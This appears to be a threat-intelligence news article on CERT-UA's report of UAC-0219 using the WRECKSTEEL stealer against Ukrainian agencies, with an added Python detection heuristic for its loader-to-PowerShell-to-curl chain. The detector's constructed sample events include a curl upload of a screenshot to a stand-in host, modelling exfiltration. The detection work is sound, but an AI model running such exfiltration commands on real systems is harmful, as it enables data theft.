Ukraine’s Computer Emergency Response Team (CERT-UA) has reported a marked increase in cyber espionage activity against the country by a group it tracks as UAC-0219. The attackers use WRECKSTEEL, a PowerShell-based stealer, to exfiltrate documents from government bodies and critical infrastructure operators. The malware is delivered through phishing emails sent from compromised accounts.
In its Apr. 1 alert CERT-UA#14283, CERT-UA stated that “the hackers used compromised accounts to send messages containing links to public file-sharing services such as DropMeFiles and Google Drive. When opened, the links executed a PowerShell script, enabling attackers to extract text documents, PDFs, images, and presentations, as well as take screenshots of infected devices.”
The public advisory covers at least three cyber espionage incidents aimed at data theft, all relying on the purpose-built PowerShell stealer dubbed WRECKSTEEL, which has been observed in both VBScript and PowerShell variants.
CERT-UA says the campaign has been active since at least the fall of 2024. In one incident, phishing emails falsely claimed that a Ukrainian government agency planned to cut salaries; the embedded link purportedly led to a list of affected employees.
While CERT-UA did not attribute the attacks to a specific country, most phishing-based espionage campaigns targeting Ukrainian government institutions originate from Russia.
“CERT-UA continues to systematically collect and analyze cyber incident data to provide up-to-date threat intelligence,” Veronika Telychko, a technical writer at SOC Prime, wrote in a Thursday blog post. SOC Prime operates a collaborative threat-detection platform built around shared detection content.
“In March 2025, at least three cyber-attacks against government agencies and the critical infrastructure sector in Ukraine were observed in the cyber threat landscape linked to the UAC-0219 hacking group,” Telychko detailed. “Adversaries primarily relied on WRECKSTEEL malware designed for file exfiltration, available in both its VBScript and PowerShell iterations.”
In the campaign covered by the alert, Telychko said, the group used compromised accounts to distribute phishing emails containing links to public file-sharing services such as DropMeFiles and Google Drive. “In some cases, these links were embedded within PDF attachments. Clicking these links triggered the download and execution of a VBScript loader (typically with a .js extension), which then executed a PowerShell script. This script was designed to search for and exfiltrate files of specific extensions (.doc, .txt, .xls, .pdf, etc.) and capture screenshots using cURL.”
She added that analysis indicates that this malicious activity has been ongoing since at least the fall of 2024. “Previously, threat actors deployed EXE files created with the NSIS installer, which contained decoy documents (PDF, JPG), a VBScript-based stealer, and the image viewer ‘IrfanView’ for taking screenshots. However, since 2025, the screenshot-capturing functionality has been integrated into PowerShell.”
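As an added example (not code from the article, CERT-UA or SOC Prime), here is a process-tree heuristic in Python for the chain just described, run over Sysmon-style process-creation events: a script host (wscript.exe or cscript.exe, which run .js as well as .vbs files) starting PowerShell from a script file, PowerShell starting curl.exe with an upload switch and a URL, and both stages appearing in one process ancestry. The process paths, file names, remote host and sample events are all constructed; real WRECKSTEEL file names and infrastructure are not in the article and are not assumed here.

```python
"""Process-tree heuristic for the phishing link -> .js/.vbs loader ->
PowerShell -> curl upload chain. Added illustration only; not CERT-UA's or
SOC Prime's detection content. Field names follow Sysmon Event ID 1 (process
creation); every event below is constructed sample data."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_FILE = re.compile(r"\.(?:js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)
# curl switches that push local content to a remote host (not plain downloads)
UPLOAD_FLAG = re.compile(
    r"(?:^|\s)(?:-F|--form|-T|--upload-file|-d|--data(?:-binary|-raw)?)(?:\s|=)")
URL = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return findings for Sysmon-style process-creation events.
    Each event needs ProcessId, ParentProcessId, Image, ParentImage, CommandLine."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        image, parent = basename(e["Image"]), basename(e["ParentImage"])
        parent_ev = by_pid.get(e["ParentProcessId"])
        parent_cmd = parent_ev["CommandLine"] if parent_ev else ""
        # Stage 1: a script host running a .js/.vbs file starts PowerShell
        if image in POWERSHELL and parent in SCRIPT_HOSTS and SCRIPT_FILE.search(parent_cmd):
            findings.append({"rule": "script_host_spawns_powershell",
                             "pid": e["ProcessId"], "detail": parent_cmd})
        # Stage 2: PowerShell launches curl with an upload switch and a URL
        if (image == "curl.exe" and parent in POWERSHELL
                and UPLOAD_FLAG.search(e["CommandLine"]) and URL.search(e["CommandLine"])):
            findings.append({"rule": "powershell_spawns_curl_upload",
                             "pid": e["ProcessId"], "detail": e["CommandLine"]})
    # Chain: a stage-2 curl whose ancestry includes a stage-1 PowerShell
    stage1 = {f["pid"] for f in findings if f["rule"] == "script_host_spawns_powershell"}
    for f in [x for x in findings if x["rule"] == "powershell_spawns_curl_upload"]:
        pid, seen = by_pid[f["pid"]]["ParentProcessId"], set()
        while pid in by_pid and pid not in seen:  # walk up, guard against cycles
            seen.add(pid)
            if pid in stage1:
                findings.append({"rule": "wrecksteel_like_chain", "pid": f["pid"],
                                 "detail": f"loader PowerShell pid {pid} -> {f['detail']}"})
                break
            pid = by_pid[pid]["ParentProcessId"]
    return findings


def ev(pid, ppid, image, parent_image, cmd):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent_image, "CommandLine": cmd}


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed: the described chain; file names, paths and host are invented
ATTACK_EVENTS = [
    ev(1200, 1000, r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
       r'wscript.exe "C:\Users\alice\Downloads\employee_list.js"'),
    ev(1300, 1200, PS_EXE, r"C:\Windows\System32\wscript.exe",
       r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\alice\AppData\Local\Temp\s.ps1"),
    ev(1400, 1300, r"C:\Windows\System32\curl.exe", PS_EXE,
       r'curl.exe -F "file=@C:\Users\alice\AppData\Local\Temp\shot.png" https://files.example/upload'),
]
# Constructed benign noise: an interactive admin shell and a curl download
BENIGN_EVENTS = [
    ev(2000, 1000, PS_EXE, r"C:\Windows\explorer.exe", "powershell.exe -NoProfile"),
    ev(2100, 2000, r"C:\Windows\System32\curl.exe", PS_EXE,
       "curl.exe -sS -o update.zip https://downloads.example/update.zip"),
]

if __name__ == "__main__":
    for f in detect(ATTACK_EVENTS + BENIGN_EVENTS):
        print(f["rule"], f["pid"], f["detail"])
```

The two stage rules are deliberately loose (administrators do run `curl -T`, and signed installers do launch script hosts), so on their own they are hunting queries rather than alerts; the chain rule, which requires the upload to descend from a PowerShell that was itself started by a script file, is what carries alerting-grade confidence. Feed it real Sysmon or EDR process-creation telemetry and baseline the single-stage hits before enabling them.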
CERT-UA’s reporting on UAC-0219 shows tooling aimed at Ukrainian organizations continuing to evolve: screenshot capture that once depended on an IrfanView binary bundled in an NSIS installer now lives inside a PowerShell script, while delivery still rests on social engineering through trusted-looking senders and public file-sharing links. That pattern matches the broader global trend of phishing-led attacks on critical infrastructure operators.
Last month, Ukraine’s state railway operator Ukrzaliznytsia was hit by a cyberattack that disrupted online ticket sales and cargo registration. The operator has since said it identified a distinct ‘Russian trace’ in the incident. Up to 90 percent of essential online passenger services have been restored, and Ukrzaliznytsia specialists plan to launch online services for freight forwarders during the first ten days of April.
The state-owned company said it took four days of round-the-clock work to restore critical services, with passenger services prioritized.